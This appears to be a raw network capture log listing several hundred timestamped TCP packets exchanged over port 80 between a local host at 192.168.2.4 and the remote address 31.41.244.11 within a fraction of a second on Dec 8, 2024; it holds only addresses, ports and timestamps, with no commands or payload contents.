                                                                                                                                          Dec 8, 2024 18:06:12.296432018 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.296451092 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.296463966 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.297208071 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.297254086 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.297338009 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.297380924 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.298197985 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.298239946 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.298346043 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.298388004 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.299031973 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.299072027 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.299186945 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.299226999 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.299935102 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.299977064 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.300040007 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.300081968 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.300843954 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.300887108 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.300960064 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.301002026 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.301728964 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.301769018 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.301783085 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.301826954 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.302668095 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.302711964 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.302750111 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.302792072 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.303551912 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.303595066 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.303658962 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.303699017 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.304483891 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.304527998 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.304594994 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.304636002 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.305397987 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.305442095 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.305484056 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.305526972 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.306294918 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.306344986 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.306493044 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.306534052 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.307219982 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.307264090 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.307372093 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.307415009 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.308111906 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.308156967 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.308214903 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.308257103 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.309031963 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.309075117 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.309109926 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.309154987 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.309923887 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.309967041 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.310281038 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.310327053 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.310837984 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.310878038 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.310935974 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.310978889 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.311745882 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.311805010 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.311827898 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.311965942 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.312755108 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.312799931 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.312858105 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.312907934 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.313544989 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.313590050 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.313657999 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.313704014 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.314460039 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.314502954 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.314564943 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.314609051 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.315387011 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.315426111 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.315494061 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.315537930 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.316272020 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.316314936 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.316406965 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.316450119 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.317202091 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.317245007 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.317327023 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.317368031 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.318128109 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.318166971 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.318196058 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.318238020 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.319024086 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.319067955 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.319070101 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.319113970 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.320008039 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.320044041 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.320116997 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.320156097 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.320842981 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.320884943 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.320970058 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.321011066 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.321742058 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.321788073 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.321839094 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.321897984 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.322648048 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.322689056 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.322746038 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.322784901 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.323533058 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.323574066 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.468466997 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.468523026 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.468622923 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.468677044 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.468852043 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.468900919 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.468981981 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.469031096 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.469759941 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.469810963 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.469845057 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.469995975 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.470659018 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.470710993 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.470767021 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.470861912 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.471636057 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.471683025 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.471712112 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.471791983 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.472569942 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.472620010 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.472690105 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.472728014 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.473403931 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.473450899 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.473531008 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.473592997 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.474272013 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.474337101 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.474409103 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.474451065 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.475189924 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.475236893 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.475337029 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.475377083 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.476099968 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.476150036 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.476206064 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.476322889 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.477047920 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.477098942 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.477128983 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.477173090 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.477936983 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.477988005 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.478061914 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.478100061 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.478847027 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.478893042 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.478975058 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.479020119 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.479739904 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.479779005 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.479835033 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.479895115 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.480648994 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.480691910 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.480762959 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.480798006 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.481565952 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.481606960 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.481642008 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.481709003 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.482484102 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.482542038 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.482584953 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.482630968 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.483366966 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.483459949 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.483484983 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.483520985 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.484277964 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.484344959 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.484381914 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.484441042 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.485892057 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.485943079 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.487126112 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.487169027 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.488711119 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.488723040 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.488734961 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.488748074 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.488756895 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.488770008 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.488806009 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.488902092 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.488914967 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.488951921 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.490017891 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.490063906 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.490170002 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.490277052 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.490830898 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.490873098 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.490998983 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.491050005 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.491636038 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.491713047 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.491790056 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.491836071 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.492451906 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.492496967 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.492724895 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.492772102 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.493489027 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.493537903 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.493653059 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.493696928 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.494417906 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.494430065 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.494466066 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.495331049 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.495388985 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.495492935 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.495776892 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.496248007 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.496294022 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.496422052 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.496531963 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.497214079 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.497226000 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.497261047 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.497853041 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.497869015 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.497910023 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.498768091 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.498811007 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.498928070 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.498970985 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.499891043 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.499907970 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.499953032 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.500710964 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.500730038 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.500754118 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.500767946 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.501665115 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.501686096 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.501705885 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.501718998 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.502592087 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.502613068 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.502645016 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.502659082 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.503401995 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.503448963 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.503540993 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.503586054 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.504308939 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.504357100 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.504515886 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.504554987 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.505635023 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.505700111 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.505801916 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.505846024 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.506108999 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.506155968 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.506258965 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.506303072 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.507056952 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.507100105 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.507251978 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.507288933 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.508172989 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.508183956 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.508217096 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.508234024 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.508902073 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.508949041 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.509047031 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.509079933 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.509835958 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.509886026 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.510304928 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.510355949 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.510777950 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.510788918 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.510823011 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.510833979 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.511655092 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.511698008 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.511816978 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.511862040 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.512552023 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.512568951 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.512579918 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.512593031 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.512598038 CET4976580192.168.2.431.41.244.11
